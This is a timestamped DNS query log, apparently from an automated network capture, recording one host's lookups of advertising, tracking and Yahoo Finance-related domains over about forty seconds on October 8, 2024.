                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.699835062 CEST192.168.2.41.1.1.10x8f91Standard query (0)beacon.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.699978113 CEST192.168.2.41.1.1.10x499dStandard query (0)beacon.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.708926916 CEST192.168.2.41.1.1.10x8d57Standard query (0)trc.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:45.710633993 CEST192.168.2.41.1.1.10x9a34Standard query (0)trc.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.953948021 CEST192.168.2.41.1.1.10x68b7Standard query (0)pm-widget.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:46.954096079 CEST192.168.2.41.1.1.10x1050Standard query (0)pm-widget.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.694715023 CEST192.168.2.41.1.1.10x5b46Standard query (0)pm-widget.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:47.695352077 CEST192.168.2.41.1.1.10xb082Standard query (0)pm-widget.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.647783995 CEST192.168.2.41.1.1.10xb576Standard query (0)pips.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:49.647960901 CEST192.168.2.41.1.1.10x24a5Standard query (0)pips.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.065448046 CEST192.168.2.41.1.1.10x64bcStandard query (0)images.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.065587044 CEST192.168.2.41.1.1.10x62fbStandard query (0)images.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.221021891 CEST192.168.2.41.1.1.10xb7b6Standard query (0)v-akfx1y454r.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.221157074 CEST192.168.2.41.1.1.10x647cStandard query (0)v-akfx1y454r.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.221731901 CEST192.168.2.41.1.1.10xf99cStandard query (0)v-bwllghkff5.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.221906900 CEST192.168.2.41.1.1.10xd0bStandard query (0)v-bwllghkff5.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.316483974 CEST192.168.2.41.1.1.10x3e95Standard query (0)pips.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.316930056 CEST192.168.2.41.1.1.10x475bStandard query (0)pips.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.366317987 CEST192.168.2.41.1.1.10x9e5cStandard query (0)cds.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.366420031 CEST192.168.2.41.1.1.10xa867Standard query (0)cds.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.652375937 CEST192.168.2.41.1.1.10x5a7Standard query (0)images.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:50.652545929 CEST192.168.2.41.1.1.10x8addStandard query (0)images.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.028621912 CEST192.168.2.41.1.1.10x229dStandard query (0)v-ca9s256c5j.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.028621912 CEST192.168.2.41.1.1.10x701bStandard query (0)v-ca9s256c5j.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.056616068 CEST192.168.2.41.1.1.10xa8a8Standard query (0)dns-aup3nb5p0.sombrero.yahoo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.056844950 CEST192.168.2.41.1.1.10x6187Standard query (0)dns-aup3nb5p0.sombrero.yahoo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.057414055 CEST192.168.2.41.1.1.10xf1ccStandard query (0)cerebro.edna.yahoo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.057585955 CEST192.168.2.41.1.1.10xb6e2Standard query (0)cerebro.edna.yahoo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.058083057 CEST192.168.2.41.1.1.10x127fStandard query (0)rwf9bb5hj.wc.06yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.058379889 CEST192.168.2.41.1.1.10xaccStandard query (0)rwf9bb5hj.wc.06yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.223460913 CEST192.168.2.41.1.1.10xe611Standard query (0)ral248z7j.wc.06yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.224545002 CEST192.168.2.41.1.1.10x85f1Standard query (0)ral248z7j.wc.06yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.841613054 CEST192.168.2.41.1.1.10x4f38Standard query (0)rwf9bb5hj.wc.06yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:51.844873905 CEST192.168.2.41.1.1.10x6c40Standard query (0)rwf9bb5hj.wc.06yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.173098087 CEST192.168.2.41.1.1.10x8ef2Standard query (0)dns-aup3nb5p0.sombrero.yahoo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.173394918 CEST192.168.2.41.1.1.10xd689Standard query (0)dns-aup3nb5p0.sombrero.yahoo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.173815012 CEST192.168.2.41.1.1.10x14c8Standard query (0)cerebro.edna.yahoo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.173947096 CEST192.168.2.41.1.1.10xc18fStandard query (0)cerebro.edna.yahoo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.174875975 CEST192.168.2.41.1.1.10xef8eStandard query (0)ral248z7j.wc.06yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.175010920 CEST192.168.2.41.1.1.10x164eStandard query (0)ral248z7j.wc.06yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.554186106 CEST192.168.2.41.1.1.10x6acfStandard query (0)wnsrvbjmeprtfrnfx.ay.deliveryA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.554728031 CEST192.168.2.41.1.1.10x32a0Standard query (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.578658104 CEST192.168.2.41.1.1.10x5755Standard query (0)v-ca9s256c5j.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:52.579231977 CEST192.168.2.41.1.1.10xf34Standard query (0)v-ca9s256c5j.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.200201035 CEST192.168.2.41.1.1.10x2c4eStandard query (0)ybar-bwllghkff5report.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.200438023 CEST192.168.2.41.1.1.10x4f46Standard query (0)ybar-bwllghkff5report.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.201374054 CEST192.168.2.41.1.1.10xadffStandard query (0)wnsrvbjmeprtfrnfx.ay.deliveryA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.201610088 CEST192.168.2.41.1.1.10x76b4Standard query (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.618427038 CEST192.168.2.41.1.1.10xca95Standard query (0)ybar-akfx1y454rreport.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.618570089 CEST192.168.2.41.1.1.10xabb6Standard query (0)ybar-akfx1y454rreport.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.834194899 CEST192.168.2.41.1.1.10x2f5aStandard query (0)cerebro-dns-report.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.834315062 CEST192.168.2.41.1.1.10xd096Standard query (0)cerebro-dns-report.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.910850048 CEST192.168.2.41.1.1.10x9bdcStandard query (0)ybar-ca9s256c5jreport.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.911079884 CEST192.168.2.41.1.1.10xb45aStandard query (0)ybar-ca9s256c5jreport.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.963474989 CEST192.168.2.41.1.1.10x603eStandard query (0)ybar-mcdn-report.wc.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:54.963608027 CEST192.168.2.41.1.1.10xab2cStandard query (0)ybar-mcdn-report.wc.yahoodns.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.195528984 CEST192.168.2.41.1.1.10xb57bStandard query (0)ch-trc-events.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.195765972 CEST192.168.2.41.1.1.10x7507Standard query (0)ch-trc-events.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.634371996 CEST192.168.2.41.1.1.10xc7b7Standard query (0)finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.634531021 CEST192.168.2.41.1.1.10x80e4Standard query (0)finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.646894932 CEST192.168.2.41.1.1.10x7c93Standard query (0)vidanalytics.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:55.647020102 CEST192.168.2.41.1.1.10x784dStandard query (0)vidanalytics.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.678419113 CEST192.168.2.41.1.1.10x9f46Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.678601027 CEST192.168.2.41.1.1.10x2570Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.691910028 CEST192.168.2.41.1.1.10xc477Standard query (0)query1.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.692106962 CEST192.168.2.41.1.1.10xf0c5Standard query (0)query1.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.697859049 CEST192.168.2.41.1.1.10x9d71Standard query (0)query2.finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:13:58.698088884 CEST192.168.2.41.1.1.10xa021Standard query (0)query2.finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:08.912349939 CEST192.168.2.41.1.1.10x230fStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:08.912682056 CEST192.168.2.41.1.1.10xe7eStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.015404940 CEST192.168.2.41.1.1.10x6d45Standard query (0)finance.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.015969992 CEST192.168.2.41.1.1.10x8efdStandard query (0)finance.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.716530085 CEST192.168.2.41.1.1.10x4087Standard query (0)s2.coinmarketcap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:10.716881990 CEST192.168.2.41.1.1.10xd311Standard query (0)s2.coinmarketcap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.751436949 CEST192.168.2.41.1.1.10x86b0Standard query (0)s2.coinmarketcap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:11.751672029 CEST192.168.2.41.1.1.10x2b5aStandard query (0)s2.coinmarketcap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.419852018 CEST192.168.2.41.1.1.10x8fc9Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.419852018 CEST192.168.2.41.1.1.10x95ccStandard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.421025038 CEST192.168.2.41.1.1.10x10fcStandard query (0)idx.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:19.421652079 CEST192.168.2.41.1.1.10x4271Standard query (0)idx.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.433887005 CEST192.168.2.41.1.1.10x9202Standard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.434005976 CEST192.168.2.41.1.1.10xd157Standard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.436841965 CEST192.168.2.41.1.1.10x2d7cStandard query (0)hbopenbid.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.436985016 CEST192.168.2.41.1.1.10x21d2Standard query (0)hbopenbid.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.441394091 CEST192.168.2.41.1.1.10xd766Standard query (0)fastlane.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.441642046 CEST192.168.2.41.1.1.10x8d65Standard query (0)fastlane.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.449664116 CEST192.168.2.41.1.1.10x77f4Standard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.449806929 CEST192.168.2.41.1.1.10x62b1Standard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.454317093 CEST192.168.2.41.1.1.10xda12Standard query (0)bidder.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.454463005 CEST192.168.2.41.1.1.10x72d2Standard query (0)bidder.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.456954002 CEST192.168.2.41.1.1.10xfaf4Standard query (0)rtb.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.457226992 CEST192.168.2.41.1.1.10xb2fStandard query (0)rtb.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.461091042 CEST192.168.2.41.1.1.10xa87aStandard query (0)prebid.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.461251974 CEST192.168.2.41.1.1.10x8f3eStandard query (0)prebid.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.465806961 CEST192.168.2.41.1.1.10xe38cStandard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.465931892 CEST192.168.2.41.1.1.10xd07eStandard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.468928099 CEST192.168.2.41.1.1.10xfc31Standard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.469060898 CEST192.168.2.41.1.1.10x7607Standard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.478230000 CEST192.168.2.41.1.1.10x8649Standard query (0)htlb.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.478362083 CEST192.168.2.41.1.1.10xc2ceStandard query (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.481836081 CEST192.168.2.41.1.1.10x96edStandard query (0)rp.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:20.481986046 CEST192.168.2.41.1.1.10x7a42Standard query (0)rp.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.465053082 CEST192.168.2.41.1.1.10x3050Standard query (0)prebid.media.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.465053082 CEST192.168.2.41.1.1.10xf1fcStandard query (0)prebid.media.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.493828058 CEST192.168.2.41.1.1.10xc68bStandard query (0)rtb.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.493988991 CEST192.168.2.41.1.1.10x7486Standard query (0)rtb.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.520370960 CEST192.168.2.41.1.1.10x9b31Standard query (0)rp.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.520370960 CEST192.168.2.41.1.1.10x6760Standard query (0)rp.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.655509949 CEST192.168.2.41.1.1.10x4f41Standard query (0)fastlane.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.655685902 CEST192.168.2.41.1.1.10x5cbdStandard query (0)fastlane.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.859853983 CEST192.168.2.41.1.1.10x1408Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.860449076 CEST192.168.2.41.1.1.10xdac2Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.891077042 CEST192.168.2.41.1.1.10x448cStandard query (0)tlx.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.891077042 CEST192.168.2.41.1.1.10xb348Standard query (0)tlx.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.892416954 CEST192.168.2.41.1.1.10xf1a1Standard query (0)display.bidder.taboola.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:21.892469883 CEST192.168.2.41.1.1.10x7febStandard query (0)display.bidder.taboola.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.211914062 CEST192.168.2.41.1.1.10xd80dStandard query (0)htlb.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.212102890 CEST192.168.2.41.1.1.10xf7dfStandard query (0)htlb.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.250591040 CEST192.168.2.41.1.1.10xa1e3Standard query (0)ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.250756025 CEST192.168.2.41.1.1.10x2c4eStandard query (0)ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.554555893 CEST192.168.2.41.1.1.10x339fStandard query (0)c2shb-oao.ssp.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.554712057 CEST192.168.2.41.1.1.10x402aStandard query (0)c2shb-oao.ssp.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.741661072 CEST192.168.2.41.1.1.10x11aStandard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:22.741873980 CEST192.168.2.41.1.1.10x46baStandard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.399579048 CEST192.168.2.41.1.1.10x900dStandard query (0)static.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.399708986 CEST192.168.2.41.1.1.10xababStandard query (0)static.criteo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.407035112 CEST192.168.2.41.1.1.10xc078Standard query (0)prebid.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.407407045 CEST192.168.2.41.1.1.10xafa6Standard query (0)prebid.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.719656944 CEST192.168.2.41.1.1.10xc70bStandard query (0)prebid.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:23.719786882 CEST192.168.2.41.1.1.10x6302Standard query (0)prebid.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:24.423527002 CEST192.168.2.41.1.1.10x29d2Standard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:24.423897982 CEST192.168.2.41.1.1.10x7fa0Standard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.093657970 CEST192.168.2.41.1.1.10x4b21Standard query (0)assets.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.093916893 CEST192.168.2.41.1.1.10x5549Standard query (0)assets.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.293601990 CEST192.168.2.41.1.1.10x26a0Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.293715954 CEST192.168.2.41.1.1.10x85eStandard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.294704914 CEST192.168.2.41.1.1.10xc08Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.294821978 CEST192.168.2.41.1.1.10x2f31Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.782004118 CEST192.168.2.41.1.1.10x7a93Standard query (0)assets.a-mo.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.782004118 CEST192.168.2.41.1.1.10x9670Standard query (0)assets.a-mo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.795624971 CEST192.168.2.41.1.1.10x1423Standard query (0)pbs.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:25.795979977 CEST192.168.2.41.1.1.10xca99Standard query (0)pbs.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.446746111 CEST192.168.2.41.1.1.10xd177Standard query (0)guce.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.446746111 CEST192.168.2.41.1.1.10xcb63Standard query (0)guce.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:26.563895941 CEST192.168.2.41.1.1.10xf3d7Standard query (0)ads.pubmatic.comA (IP address)IN (0x0001)false
